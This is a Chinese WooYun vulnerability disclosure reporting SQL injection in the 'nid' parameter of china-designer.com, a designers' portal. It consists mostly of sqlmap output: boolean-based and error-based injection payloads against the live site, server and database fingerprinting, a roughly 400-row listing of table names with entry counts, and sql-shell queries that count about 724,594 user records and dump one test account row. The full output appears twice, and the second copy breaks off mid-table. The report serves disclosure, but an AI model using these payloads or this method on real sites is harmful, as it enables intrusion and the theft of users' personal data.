当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127446

漏洞标题:中国建筑与室内设计师网SQL注射漏洞(72W设计师+设计公司信息泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 安全小飞侠

提交时间:2015-07-19 17:28

修复时间:2015-09-07 08:18

公开时间:2015-09-07 08:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-19: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-08-03: 细节向核心白帽子及相关领域专家公开
2015-08-13: 细节向普通白帽子公开
2015-08-23: 细节向实习白帽子公开
2015-09-07: 细节向公众公开

简要描述:

中国建筑与室内设计师网SQL注射漏洞(72W设计师+设计公司信息泄露)
请叫我安全小飞侠,谢谢!

详细说明:

http://www.china-designer.com/sub/newsdetail.aspx?cat=3&nid=2013112214135454
注入参数: nid


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.china-designer.com:80/sub/newsdetail.aspx?cat=3&nid=2013
112214135454' AND 5946=5946 AND 'Zjkt'='Zjkt
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://www.china-designer.com:80/sub/newsdetail.aspx?cat=3&nid=2013
112214135454' AND 7918=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(11
3)+CHAR(113)+(SELECT (CASE WHEN (7918=7918) THEN CHAR(49) ELSE CHAR(48) END))+CH
AR(113)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'COtK'='COtK
---
[21:42:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: gbchina
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.syncobj_0x3036394144373334 | 7167971 |
| dbo.syncobj_0x3544303444463639 | 7167971 |
| dbo.t_keywordsrelation | 7167971 |
| dbo.Dynamic | 6033201 |
| dbo.home_index | 3598944 |
| dbo.syncobj_0x3541433545363235 | 3598944 |
| dbo.syncobj_0x4245394639384436 | 3598944 |
| dbo.Ad_IpCount | 2872632 |
| dbo.syncobj_0x3635363730383238 | 2872632 |
| dbo.jf_list | 2285673 |
| dbo.search_pic | 1992307 |
| dbo.t_Pic | 1838899 |
| dbo.syncobj_0x3234453530314435 | 1820193 |
| dbo.syncobj_0x4430463535453143 | 1820193 |
| dbo.t_Where | 1820193 |
| dbo.Old_TypeValue | 1742989 |
| dbo.search_pic_2 | 1731301 |
| dbo.t_PersonalGuestBook | 1422191 |
| dbo.home_guest | 1385997 |
| dbo.t_hotkeywords | 1187513 |
| dbo.App_statistic | 1170699 |
| dbo.t_Mail | 981350 |
| dbo.ex_project_picture | 925182 |
| dbo.syncobj_0x3434393246393743 | 738532 |
| dbo.syncobj_0x3535314436423036 | 738532 |
| dbo.t_Message | 738532 |
| dbo.t_User | 724566 |
| dbo.syncobj_0x3032413339314432 | 685576 |
| dbo.syncobj_0x3839373536453732 | 685576 |
| dbo.t_keywords | 685576 |
| dbo.syncobj_0x4133453043393238 | 681537 |
| dbo.syncobj_0x4241373034334442 | 681537 |
| dbo.t_Apply | 681537 |
| dbo.Dynamic_v2 | 559426 |
| dbo.syncobj_0x4138333332434145 | 522015 |
| dbo.syncobj_0x4142373939333238 | 522015 |
| dbo.t_searchrelation | 522015 |
| dbo.Error | 519745 |
| dbo.SMSLog | 504470 |
| dbo.t_Character | 494174 |
| dbo.syncobj_0x3838463843303546 | 393211 |
| dbo.syncobj_0x4135373230394138 | 393211 |
| dbo.t_Online | 393211 |
| dbo.t_photo | 341263 |
| dbo.search_designer | 336837 |
| dbo.jt_avoterecord | 334579 |
| dbo.index_designer | 289677 |
| dbo.mobile_Validate | 279284 |
| dbo.ex_project | 256579 |
| dbo.search_pic_3 | 226442 |
| dbo.tbCompetition_project_picture | 199686 |
| dbo.jf_integraph | 197832 |
| dbo.blog | 190438 |
| dbo.email_Validate | 166649 |
| dbo.qt_avoterecord | 115284 |
| dbo.search_pic_4 | 99753 |
| dbo.syncobj_0x3731363044463734 | 93312 |
| dbo.syncobj_0x4441363832343030 | 93312 |
| dbo.t_pic_class | 93312 |
| dbo.syncobj_0x3433304239343834 | 88422 |
| dbo.syncobj_0x3945304633363938 | 88422 |
| dbo.t_fav | 88422 |
| dbo.pic_view | 55868 |
| dbo.syncobj_0x3636353541383141 | 55868 |
| dbo.syncobj_0x4544443544363345 | 55868 |
| dbo.Del_statistics | 51937 |
| dbo.IF_LoginRecord | 47924 |
| dbo.ex_comment | 41962 |
| dbo.syncobj_0x3131433341303545 | 41962 |
| dbo.syncobj_0x4131463542423438 | 41962 |
| dbo.blog_Comment | 36914 |
| dbo.syncobj_0x4643303239304439 | 36914 |
| dbo.syncobj_0x3432324636414143 | 27370 |
| dbo.syncobj_0x4536454342344534 | 27370 |
| dbo.t_dns | 27370 |
| dbo.syncobj_0x3532434341423445 | 24745 |
| dbo.syncobj_0x3934303441353239 | 24745 |
| dbo.t_favproject | 24745 |
| dbo.t_owner_project | 22304 |
| dbo.syncobj_0x3846453633373045 | 21622 |
| dbo.syncobj_0x4439363544313744 | 21622 |
| dbo.t_Fav_Product | 21622 |
| dbo.jobinfo | 18119 |
| dbo.T_View_Contact_Log | 17855 |
| dbo.T_View_Contact_Num | 16499 |
| dbo.bidfor | 15432 |
| dbo.blogorg_news | 14840 |
| dbo.syncobj_0x3638393838313832 | 13477 |
| dbo.syncobj_0x4139304530393935 | 13477 |
| dbo.t_owner_answer | 13477 |
| dbo.tbCompetitionReg | 12993 |
| dbo.tbCompetition_project | 12142 |
| dbo.qt_avote | 11240 |
| dbo.search_ownerproject | 10648 |
| dbo.jobinfo_company | 10327 |
| dbo.ds_reg | 9945 |
| dbo.ctf_Apply | 9864 |
| dbo.syncobj_0x3334303943434344 | 9864 |
| dbo.syncobj_0x4634343138423543 | 9864 |
| dbo.t_Material_keywordsrelation | 9235 |
| dbo.syncobj_0x3330333631394332 | 8698 |
| dbo.syncobj_0x3333344242443831 | 8698 |
| dbo.vote_Votes | 8698 |
| dbo.jt_Rating | 7430 |
| dbo.ht_User | 6760 |
| dbo.t_owner_Project_Designer | 5744 |
| dbo.syncobj_0x3134413936313632 | 5500 |
| dbo.syncobj_0x3735314638414642 | 5500 |
| dbo.t_owner_projectpic | 5500 |
| dbo.jt_project | 4983 |
| dbo.qt_Student_Integraph | 3611 |
| dbo.accident | 3356 |
| dbo.syncobj_0x4635353444344139 | 3356 |
| dbo.tbTempPassWordLog | 3242 |
| dbo.jt_reg | 3241 |
| dbo.ht_Lottery | 3132 |
| dbo.jf_game | 3023 |
| dbo.t_School | 2969 |
| dbo.qt_ajury | 2776 |
| dbo.syncobj_0x3031413333373637 | 2546 |
| dbo.syncobj_0x3531463132343431 | 2546 |
| dbo.t_owner_ask | 2546 |
| dbo.tb_App_Client_Log | 2519 |
| dbo.search_ownerQuestion | 2506 |
| dbo.T_Expertise | 2372 |
| dbo.syncobj_0x3035443135444233 | 2349 |
| dbo.syncobj_0x3742393934343432 | 2349 |
| dbo.t_friend_class | 2349 |
| dbo.philips_Case | 2308 |
| dbo.applyvip | 2286 |
| dbo.syncobj_0x4142303930454531 | 2286 |
| dbo.syncobj_0x4138313046323233 | 2023 |
| dbo.syncobj_0x4246363536333544 | 2023 |
| dbo.t_favpic_class | 2023 |
| dbo.tongbupan | 1986 |
| dbo.T_Business_Area | 1875 |
| dbo.qt_jifen | 1834 |
| dbo.qt_Practice | 1823 |
| dbo.cdlyan | 1716 |
| dbo.table_ClassicsCase | 1704 |
| dbo.SBH_Select | 1658 |
| dbo.IF_SkipRecord | 1531 |
| dbo.sub_News | 1428 |
| dbo.cdvote | 1385 |
| dbo.tb_SMSCount_Detail | 1199 |
| dbo.blog_comment_reply | 1153 |
| dbo.syncobj_0x3135383135384230 | 1153 |
| dbo.syncobj_0x3844383837364141 | 1153 |
| dbo.T_Business_Contact | 1058 |
| dbo.ADItems | 993 |
| dbo.t_Material_keywords | 942 |
| dbo.T_Last_View_Time_Owner | 907 |
| dbo.rz100_project | 846 |
| dbo.syncobj_0x3046324634413831 | 846 |
| dbo.syncobj_0x3143374132313745 | 846 |
| dbo.t_favproject_class | 846 |
| dbo.tb_App_Favorite | 825 |
| dbo.Ad_Count | 810 |
| dbo.syncobj_0x3543364446364333 | 810 |
| dbo.t_News_Calender | 715 |
| dbo.Index_RightAd | 665 |
| dbo.syncobj_0x3941383633393730 | 665 |
| dbo.syncobj_0x4143314245364632 | 665 |
| dbo.vip_smallphoto | 623 |
| dbo.syncobj_0x3346454436324533 | 609 |
| dbo.syncobj_0x3436374537393234 | 609 |
| dbo.t_favproduct_class | 609 |
| dbo.Index_Link | 595 |
| dbo.syncobj_0x3138463739323237 | 595 |
| dbo.syncobj_0x4136363431363143 | 595 |
| dbo.t_Fav_Case | 586 |
| dbo.Contest_Re_Views_Show | 565 |
| dbo.T_Tel_Validate | 509 |
| dbo.T_Tel_ValiDate_Log | 508 |
| dbo.tbDesignerPartyVoteLog | 505 |
| dbo.t_city | 501 |
| dbo.syncobj_0x3535423233383244 | 500 |
| dbo.syncobj_0x4637413930433846 | 500 |
| dbo.TABLE_city | 500 |
| dbo.qt_TSrelation | 445 |
| dbo.App_statistic_login | 442 |
| dbo.rz_reg | 426 |
| dbo.t_user_easyInfo | 425 |
| dbo.Designer_labelbak20120213 | 336 |
| dbo.DesignBillBoard_Judge | 327 |
| dbo.t_user_OpenAppList | 308 |
| dbo.jt_Finalist_excellent_Score | 296 |
| dbo.Designer_label | 293 |
| dbo.SBH_News | 291 |
| dbo.Contest_Winning_Projects_List | 277 |
| dbo.syncobj_0x3632304432343832 | 257 |
| dbo.syncobj_0x4337444632383937 | 257 |
| dbo.t_systemmail | 257 |
| dbo.DesignBillBoard_Organ | 255 |
| dbo.Index_ImgHotNew | 239 |
| dbo.syncobj_0x3930333444303341 | 239 |
| dbo.syncobj_0x4631333136413043 | 239 |
| dbo.t_User_Identification_Photo | 209 |
| dbo.AdBasicData | 193 |
| dbo.tb_App_Photo | 193 |
| dbo.SouFun_Index | 190 |
| dbo.syncobj_0x3445423939313142 | 190 |
| dbo.syncobj_0x4242373733303437 | 190 |
| dbo.philips_User | 182 |
| dbo.jt_admin | 171 |
| dbo.ctf_Address | 164 |
| dbo.syncobj_0x3544384539433042 | 164 |
| dbo.syncobj_0x3639353645383542 | 164 |
| dbo.gmz_Designer | 162 |
| dbo.Index_Company | 160 |
| dbo.hfl_baoming | 141 |
| dbo.jt_Nominate | 138 |
| dbo.Sub_PicNews | 136 |
| dbo.HelpLayer | 115 |
| dbo.sub_pinpaisj | 111 |
| dbo.t_user_temp | 111 |
| dbo.Index_LOGO | 97 |
| dbo.syncobj_0x3938344334443643 | 97 |
| dbo.syncobj_0x4333333444443136 | 97 |
| dbo.qt_anews | 93 |
| dbo.Contest_Companies_Intention | 81 |
| dbo.philips_Article | 80 |
| dbo.philips_DownLoad | 73 |
| dbo.Contest_Provide_Jobs_Companies | 72 |
| dbo.syncobj_0x3444373136344343 | 68 |
| dbo.syncobj_0x3946303537433343 | 68 |
| dbo.Work | 68 |
| dbo.tb_App_PollOption | 65 |
| dbo.t_Fav_Case_Class | 64 |
| dbo.Index_NetCase | 63 |
| dbo.jt_Type | 60 |
| dbo.px_module | 60 |
| dbo.tb_App_Topic | 59 |
| dbo.Index_HotNew | 56 |
| dbo.syncobj_0x4230383245313446 | 56 |
| dbo.syncobj_0x4544424346303744 | 56 |
| dbo.RePassWord_Validate | 53 |
| dbo.SBH_sjzl | 53 |
| dbo.home_style | 51 |
| dbo.syncobj_0x3642464642343143 | 51 |
| dbo.syncobj_0x4142353135433642 | 51 |
| dbo.syncobj_0x4244413446434633 | 51 |
| dbo.syncobj_0x4433374335323042 | 51 |
| dbo.vote_Options | 51 |
| dbo.jt_AdminManage | 50 |
| dbo.px_pic | 48 |
| dbo.t_User_Err_List | 48 |
| dbo.DesignBillBoard_Flow | 46 |
| dbo.qt_Student_Contest_Winners_log | 45 |
| dbo.SBH_LinkAndOrg | 44 |
| dbo.tbSubSite | 41 |
| dbo.home_style_bak | 40 |
| dbo.zhuanti_vote | 40 |
| dbo.tb_App_Comment | 39 |
| dbo.ctf_Teacher | 38 |
| dbo.sub_admin | 38 |
| dbo.syncobj_0x3231343633344434 | 38 |
| dbo.syncobj_0x4538334130374631 | 38 |
| dbo.sjz_show | 36 |
| dbo.syncobj_0x3137423536383539 | 36 |
| dbo.syncobj_0x3946374131363844 | 36 |
| dbo.t_Location | 36 |
| dbo.syncobj_0x4236334336444443 | 35 |
| dbo.syncobj_0x4443453732434439 | 35 |
| dbo.tt_Location | 35 |
| dbo.Index_DesignShow | 33 |
| dbo.syncobj_0x3643353431313032 | 33 |
| dbo.syncobj_0x4635384541364536 | 33 |
| dbo.sub_yunyingjigou | 30 |
| dbo.philips_Design | 29 |
| dbo.tbCompetition | 27 |
| dbo.Designer_label_Typebak2012013 | 26 |
| dbo.Designer_label_Type | 25 |
| dbo.Contest_Awards | 24 |
| dbo.tbGetCalendar | 24 |
| dbo.blog_Category | 23 |
| dbo.SouFun_Index_Img | 23 |
| dbo.syncobj_0x3338414535363437 | 23 |
| dbo.syncobj_0x3430434341413342 | 23 |
| dbo.hfl_project | 22 |
| dbo.tb_App_Project_Index | 22 |
| dbo.Index_Book | 21 |
| dbo.syncobj_0x3439373831353438 | 21 |
| dbo.syncobj_0x3641364341353544 | 21 |
| dbo.App_AD | 20 |
| dbo.blog_rec_author | 19 |
| dbo.Index_AdType | 19 |
| dbo.syncobj_0x3532443735364142 | 19 |
| dbo.syncobj_0x3537454232434146 | 19 |
| dbo.syncobj_0x3631334544323839 | 19 |
| dbo.syncobj_0x3832423432384545 | 19 |
| dbo.syncobj_0x3937344646423442 | 19 |
| dbo.syncobj_0x4241423443353936 | 19 |
| dbo.syncobj_0x4246313243323443 | 19 |
| dbo.syncobj_0x4642304535373342 | 19 |
| dbo.t_Count | 19 |
| dbo.t_owner_Project_Pic | 19 |
| dbo.t_pic_type | 19 |
| dbo.v_tuijian_ZL | 19 |
| dbo.Index_Region | 18 |
| dbo.tb_App_Like | 18 |
| dbo.blogorg_Category | 16 |
| dbo.tbTempPassWord | 16 |
| dbo.DesignBillBoard_News | 13 |
| dbo.home_module | 13 |
| dbo.syncobj_0x3037463641324346 | 13 |
| dbo.syncobj_0x3933454230353246 | 13 |
| dbo.philips_imgnews | 12 |
| dbo.t_remark | 12 |
| dbo.t_user_PassWord_Back_log | 12 |
| dbo.ctf_smallClass | 11 |
| dbo.syncobj_0x3237373741303233 | 11 |
| dbo.syncobj_0x3834393332333241 | 11 |
| dbo.tbDesignerPartyVote | 11 |
| dbo.SBH_NewsClass | 10 |
| dbo.syncobj_0x3732313730433746 | 10 |
| dbo.syncobj_0x3738454346433644 | 10 |
| dbo.t_zhitou | 10 |
| dbo.tb_App_PollStatis | 10 |
| dbo.DesignBillBoard | 9 |
| dbo.Manage_user | 9 |
| dbo.syncobj_0x3731364635413039 | 9 |
| dbo.syncobj_0x4134373732304136 | 9 |
| dbo.t_User_App_Admin_RoleID | 9 |
| dbo.DesignBillBorad_Award | 8 |
| dbo.Home_Format | 8 |
| dbo.RePassWord_Other | 8 |
| dbo.syncobj_0x3030334130424142 | 8 |
| dbo.syncobj_0x3736373231383442 | 8 |
| dbo.syncobj_0x4336374439463334 | 8 |
| dbo.syncobj_0x4443453443323634 | 8 |
| dbo.tb_App_Bookmark | 8 |
| dbo.tt_Job | 8 |
| dbo.jt_Books | 7 |
| dbo.px_lesson | 7 |
| dbo.syncobj_0x4142414544343444 | 7 |
| dbo.syncobj_0x4339453037363530 | 7 |
| dbo.tb_App_Invite | 7 |
| dbo.vote_Info | 7 |
| dbo.philips_arctype | 6 |
| dbo.t_user_PassWord_Back | 6 |
| dbo.UploadFielConfig | 6 |
| dbo.Activity_MemClass | 5 |
| dbo.philips_guest | 5 |
| dbo.t_user_Err | 5 |
| dbo.ADAdmin | 4 |
| dbo.ctf_bigClass | 4 |
| dbo.philips_DownType | 4 |
| dbo.syncobj_0x3741373537423345 | 4 |
| dbo.syncobj_0x4336443739304436 | 4 |
| dbo.T_Last_view_time | 4 |
| dbo.t_User_App_Admin | 4 |
| dbo.Activity_intent | 3 |
| dbo.ctf_admin | 3 |
| dbo.Index_News | 3 |
| dbo.qt_action | 3 |
| dbo.SBH_AdminUser | 3 |
| dbo.syncobj_0x3136413235434336 | 3 |
| dbo.syncobj_0x3246313345353533 | 3 |
| dbo.syncobj_0x3446393732364436 | 3 |
| dbo.syncobj_0x3838364133413346 | 3 |
| dbo.t_User_App_Admin_Account | 3 |
| dbo.t_user_App_Admin_Other | 3 |
| dbo.t_User_App_Role | 3 |
| dbo.tbEasySelectionRecommend | 3 |
| dbo.sub_NewsClass | 2 |
| dbo.tb_App_Entrust | 2 |
| dbo.tb_SMSCount | 2 |
| dbo.WeiBoType | 2 |
| dbo.Activity_mess | 1 |
| dbo.jt_Order | 1 |
| dbo.jt_Order_Items | 1 |
| dbo.philips_cnm | 1 |
| dbo.syncobj_0x3444323736353441 | 1 |
| dbo.syncobj_0x4145454530373342 | 1 |
| dbo.t_dirtystr | 1 |
| dbo.tb_App_Entrust_RE | 1 |
+------------------------------------+---------+


[21:42:30] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' an
d press ENTER
sql-shell> select count(*) from t_user
[21:43:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) f
rom t_user'
[21:43:00] [INFO] retrieved: 724594
select count(*) from t_user: '724594'


为了确认是否该表就是设计师表,于是以wooyun@126.com邮箱注册了一个账号,测试结果显示此表正是网站的会员表.

select * from t_user where email='wooyun@126.com' [1]:
[*] 1084743, wooyuntest, , wooyun@126.com, 0, , 0, 1, 0, 0, 0, 5648606D4E189B25,
, 07 17 2015 \\?a0\\?38:33PM, , , , 0, 0, 0, 1, 0, 0, 0, 1, 0, , 01 \\?a0\\?31
1900 12:00AM, 0, 0, 0, 1, , 01 \\?a0\\?31 1900 12:00AM, 0, 0,


捕获.JPG


漏洞证明:

http://www.china-designer.com/sub/newsdetail.aspx?cat=3&nid=2013112214135454
注入参数: nid


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.china-designer.com:80/sub/newsdetail.aspx?cat=3&nid=2013
112214135454' AND 5946=5946 AND 'Zjkt'='Zjkt
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://www.china-designer.com:80/sub/newsdetail.aspx?cat=3&nid=2013
112214135454' AND 7918=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(11
3)+CHAR(113)+(SELECT (CASE WHEN (7918=7918) THEN CHAR(49) ELSE CHAR(48) END))+CH
AR(113)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'COtK'='COtK
---
[21:42:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: gbchina
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.syncobj_0x3036394144373334 | 7167971 |
| dbo.syncobj_0x3544303444463639 | 7167971 |
| dbo.t_keywordsrelation | 7167971 |
| dbo.Dynamic | 6033201 |
| dbo.home_index | 3598944 |
| dbo.syncobj_0x3541433545363235 | 3598944 |
| dbo.syncobj_0x4245394639384436 | 3598944 |
| dbo.Ad_IpCount | 2872632 |
| dbo.syncobj_0x3635363730383238 | 2872632 |
| dbo.jf_list | 2285673 |
| dbo.search_pic | 1992307 |
| dbo.t_Pic | 1838899 |
| dbo.syncobj_0x3234453530314435 | 1820193 |
| dbo.syncobj_0x4430463535453143 | 1820193 |
| dbo.t_Where | 1820193 |
| dbo.Old_TypeValue | 1742989 |
| dbo.search_pic_2 | 1731301 |
| dbo.t_PersonalGuestBook | 1422191 |
| dbo.home_guest | 1385997 |
| dbo.t_hotkeywords | 1187513 |
| dbo.App_statistic | 1170699 |
| dbo.t_Mail | 981350 |
| dbo.ex_project_picture | 925182 |
| dbo.syncobj_0x3434393246393743 | 738532 |
| dbo.syncobj_0x3535314436423036 | 738532 |
| dbo.t_Message | 738532 |
| dbo.t_User | 724566 |
| dbo.syncobj_0x3032413339314432 | 685576 |
| dbo.syncobj_0x3839373536453732 | 685576 |
| dbo.t_keywords | 685576 |
| dbo.syncobj_0x4133453043393238 | 681537 |
| dbo.syncobj_0x4241373034334442 | 681537 |
| dbo.t_Apply | 681537 |
| dbo.Dynamic_v2 | 559426 |
| dbo.syncobj_0x4138333332434145 | 522015 |
| dbo.syncobj_0x4142373939333238 | 522015 |
| dbo.t_searchrelation | 522015 |
| dbo.Error | 519745 |
| dbo.SMSLog | 504470 |
| dbo.t_Character | 494174 |
| dbo.syncobj_0x3838463843303546 | 393211 |
| dbo.syncobj_0x4135373230394138 | 393211 |
| dbo.t_Online | 393211 |
| dbo.t_photo | 341263 |
| dbo.search_designer | 336837 |
| dbo.jt_avoterecord | 334579 |
| dbo.index_designer | 289677 |
| dbo.mobile_Validate | 279284 |
| dbo.ex_project | 256579 |
| dbo.search_pic_3 | 226442 |
| dbo.tbCompetition_project_picture | 199686 |
| dbo.jf_integraph | 197832 |
| dbo.blog | 190438 |
| dbo.email_Validate | 166649 |
| dbo.qt_avoterecord | 115284 |
| dbo.search_pic_4 | 99753 |
| dbo.syncobj_0x3731363044463734 | 93312 |
| dbo.syncobj_0x4441363832343030 | 93312 |
| dbo.t_pic_class | 93312 |
| dbo.syncobj_0x3433304239343834 | 88422 |
| dbo.syncobj_0x3945304633363938 | 88422 |
| dbo.t_fav | 88422 |
| dbo.pic_view | 55868 |
| dbo.syncobj_0x3636353541383141 | 55868 |
| dbo.syncobj_0x4544443544363345 | 55868 |
| dbo.Del_statistics | 51937 |
| dbo.IF_LoginRecord | 47924 |
| dbo.ex_comment | 41962 |
| dbo.syncobj_0x3131433341303545 | 41962 |
| dbo.syncobj_0x4131463542423438 | 41962 |
| dbo.blog_Comment | 36914 |
| dbo.syncobj_0x4643303239304439 | 36914 |
| dbo.syncobj_0x3432324636414143 | 27370 |
| dbo.syncobj_0x4536454342344534 | 27370 |
| dbo.t_dns | 27370 |
| dbo.syncobj_0x3532434341423445 | 24745 |
| dbo.syncobj_0x3934303441353239 | 24745 |
| dbo.t_favproject | 24745 |
| dbo.t_owner_project | 22304 |
| dbo.syncobj_0x3846453633373045 | 21622 |
| dbo.syncobj_0x4439363544313744 | 21622 |
| dbo.t_Fav_Product | 21622 |
| dbo.jobinfo | 18119 |
| dbo.T_View_Contact_Log | 17855 |
| dbo.T_View_Contact_Num | 16499 |
| dbo.bidfor | 15432 |
| dbo.blogorg_news | 14840 |
| dbo.syncobj_0x3638393838313832 | 13477 |
| dbo.syncobj_0x4139304530393935 | 13477 |
| dbo.t_owner_answer | 13477 |
| dbo.tbCompetitionReg | 12993 |
| dbo.tbCompetition_project | 12142 |
| dbo.qt_avote | 11240 |
| dbo.search_ownerproject | 10648 |
| dbo.jobinfo_company | 10327 |
| dbo.ds_reg | 9945 |
| dbo.ctf_Apply | 9864 |
| dbo.syncobj_0x3334303943434344 | 9864 |
| dbo.syncobj_0x4634343138423543 | 9864 |
| dbo.t_Material_keywordsrelation | 9235 |
| dbo.syncobj_0x3330333631394332 | 8698 |
| dbo.syncobj_0x3333344242443831 | 8698 |
| dbo.vote_Votes | 8698 |
| dbo.jt_Rating | 7430 |
| dbo.ht_User | 6760 |
| dbo.t_owner_Project_Designer | 5744 |
| dbo.syncobj_0x3134413936313632 | 5500 |
| dbo.syncobj_0x3735314638414642 | 5500 |
| dbo.t_owner_projectpic | 5500 |
| dbo.jt_project | 4983 |
| dbo.qt_Student_Integraph | 3611 |
| dbo.accident | 3356 |
| dbo.syncobj_0x4635353444344139 | 3356 |
| dbo.tbTempPassWordLog | 3242 |
| dbo.jt_reg | 3241 |
| dbo.ht_Lottery | 3132 |
| dbo.jf_game | 3023 |
| dbo.t_School | 2969 |
| dbo.qt_ajury | 2776 |
| dbo.syncobj_0x3031413333373637 | 2546 |
| dbo.syncobj_0x3531463132343431 | 2546 |
| dbo.t_owner_ask | 2546 |
| dbo.tb_App_Client_Log | 2519 |
| dbo.search_ownerQuestion | 2506 |
| dbo.T_Expertise | 2372 |
| dbo.syncobj_0x3035443135444233 | 2349 |
| dbo.syncobj_0x3742393934343432 | 2349 |
| dbo.t_friend_class | 2349 |
| dbo.philips_Case | 2308 |
| dbo.applyvip | 2286 |
| dbo.syncobj_0x4142303930454531 | 2286 |
| dbo.syncobj_0x4138313046323233 | 2023 |
| dbo.syncobj_0x4246363536333544 | 2023 |
| dbo.t_favpic_class | 2023 |
| dbo.tongbupan | 1986 |
| dbo.T_Business_Area | 1875 |
| dbo.qt_jifen | 1834 |
| dbo.qt_Practice | 1823 |
| dbo.cdlyan | 1716 |
| dbo.table_ClassicsCase | 1704 |
| dbo.SBH_Select | 1658 |
| dbo.IF_SkipRecord | 1531 |
| dbo.sub_News | 1428 |
| dbo.cdvote | 1385 |
| dbo.tb_SMSCount_Detail | 1199 |
| dbo.blog_comment_reply | 1153 |
| dbo.syncobj_0x3135383135384230 | 1153 |
| dbo.syncobj_0x3844383837364141 | 1153 |
| dbo.T_Business_Contact | 1058 |
| dbo.ADItems | 993 |
| dbo.t_Material_keywords | 942 |
| dbo.T_Last_View_Time_Owner | 907 |
| dbo.rz100_project | 846 |
| dbo.syncobj_0x3046324634413831 | 846 |
| dbo.syncobj_0x3143374132313745 | 846 |
| dbo.t_favproject_class | 846 |
| dbo.tb_App_Favorite | 825 |
| dbo.Ad_Count | 810 |
| dbo.syncobj_0x3543364446364333 | 810 |
| dbo.t_News_Calender | 715 |
| dbo.Index_RightAd | 665 |
| dbo.syncobj_0x3941383633393730 | 665 |
| dbo.syncobj_0x4143314245364632 | 665 |
| dbo.vip_smallphoto | 623 |
| dbo.syncobj_0x3346454436324533 | 609 |
| dbo.syncobj_0x3436374537393234 | 609 |
| dbo.t_favproduct_class | 609 |
| dbo.Index_Link | 595 |
| dbo.syncobj_0x3138463739323237 | 595 |
| dbo.syncobj_0x4136363431363143 | 595 |
| dbo.t_Fav_Case | 586 |
| dbo.Contest_Re_Views_Show | 565 |
| dbo.T_Tel_Validate | 509 |
| dbo.T_Tel_ValiDate_Log | 508 |
| dbo.tbDesignerPartyVoteLog | 505 |
| dbo.t_city | 501 |
| dbo.syncobj_0x3535423233383244 | 500 |
| dbo.syncobj_0x4637413930433846 | 500 |
| dbo.TABLE_city | 500 |
| dbo.qt_TSrelation | 445 |
| dbo.App_statistic_login | 442 |
| dbo.rz_reg | 426 |
| dbo.t_user_easyInfo | 425 |
| dbo.Designer_labelbak20120213 | 336 |
| dbo.DesignBillBoard_Judge | 327 |
| dbo.t_user_OpenAppList | 308 |
| dbo.jt_Finalist_excellent_Score | 296 |
| dbo.Designer_label | 293 |
| dbo.SBH_News | 291 |
| dbo.Contest_Winning_Projects_List | 277 |
| dbo.syncobj_0x3632304432343832 | 257 |
| dbo.syncobj_0x4337444632383937 | 257 |
| dbo.t_systemmail | 257 |
| dbo.DesignBillBoard_Organ | 255 |
| dbo.Index_ImgHotNew | 239 |
| dbo.syncobj_0x3930333444303341 | 239 |
| dbo.syncobj_0x4631333136413043 | 239 |
| dbo.t_User_Identification_Photo | 209 |
| dbo.AdBasicData | 193 |
| dbo.tb_App_Photo | 193 |
| dbo.SouFun_Index | 190 |
| dbo.syncobj_0x3445423939313142 | 190 |
| dbo.syncobj_0x4242373733303437 | 190 |
| dbo.philips_User | 182 |
| dbo.jt_admin | 171 |
| dbo.ctf_Address | 164 |
| dbo.syncobj_0x3544384539433042 | 164 |
| dbo.syncobj_0x3639353645383542 | 164 |
| dbo.gmz_Designer | 162 |
| dbo.Index_Company | 160 |
| dbo.hfl_baoming | 141 |
| dbo.jt_Nominate | 138 |
| dbo.Sub_PicNews | 136 |
| dbo.HelpLayer | 115 |
| dbo.sub_pinpaisj | 111 |
| dbo.t_user_temp | 111 |
| dbo.Index_LOGO | 97 |
| dbo.syncobj_0x3938344334443643 | 97 |
| dbo.syncobj_0x4333333444443136 | 97 |
| dbo.qt_anews | 93 |
| dbo.Contest_Companies_Intention | 81 |
| dbo.philips_Article | 80 |
| dbo.philips_DownLoad | 73 |
| dbo.Contest_Provide_Jobs_Companies | 72 |
| dbo.syncobj_0x3444373136344343 | 68 |
| dbo.syncobj_0x3946303537433343 | 68 |
| dbo.Work | 68 |
| dbo.tb_App_PollOption | 65 |
| dbo.t_Fav_Case_Class | 64 |
| dbo.Index_NetCase | 63 |
| dbo.jt_Type | 60 |
| dbo.px_module | 60 |
| dbo.tb_App_Topic | 59 |
| dbo.Index_HotNew | 56 |
| dbo.syncobj_0x4230383245313446 | 56 |
| dbo.syncobj_0x4544424346303744 | 56 |
| dbo.RePassWord_Validate | 53 |
| dbo.SBH_sjzl | 53 |
| dbo.home_style | 51 |
